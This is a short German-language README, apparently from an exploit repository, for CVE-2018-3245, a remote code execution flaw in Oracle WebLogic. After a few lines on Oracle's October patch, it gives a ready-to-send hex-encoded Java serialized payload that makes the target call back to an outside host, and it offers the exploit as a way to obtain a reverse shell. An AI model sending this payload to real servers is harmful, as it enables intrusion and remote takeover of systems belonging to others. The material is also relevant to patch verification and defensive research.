
Exploit für CVE-2018-3245, eine Schwachstelle zur Remote-Code-Ausführung in Weblogic, mit einem bereitgestellten Payload, um eine Reverse Shell zu erhalten.
CVE-2018-3245
Am 16. Oktober Ortszeit, in der Frühe des 17. Oktober Pekinger Zeit, veröffentlichte Oracle offiziell das Critical Patch Update (CPU) für Oktober (drittes Quartal).
Es reparierte eine Sicherheitslücke für Remote-Code-Ausführung in Weblogic (CVE-2018-2893), die im CPU-Patch vom Juli (zweites Quartal) nicht vollständig behoben wurde. Die neu behobene Schwachstelle trägt die Nummer CVE-2018-3245.
Oracle hat die Schwachstelle im aktuellen Critical Patch Update (CPU) behoben. Betroffene Benutzer werden dringend aufgefordert, so schnell wie möglich ein Update durchzuführen, um sich zu schützen.


jas502n-poc.txt
Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e69636173746552656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078
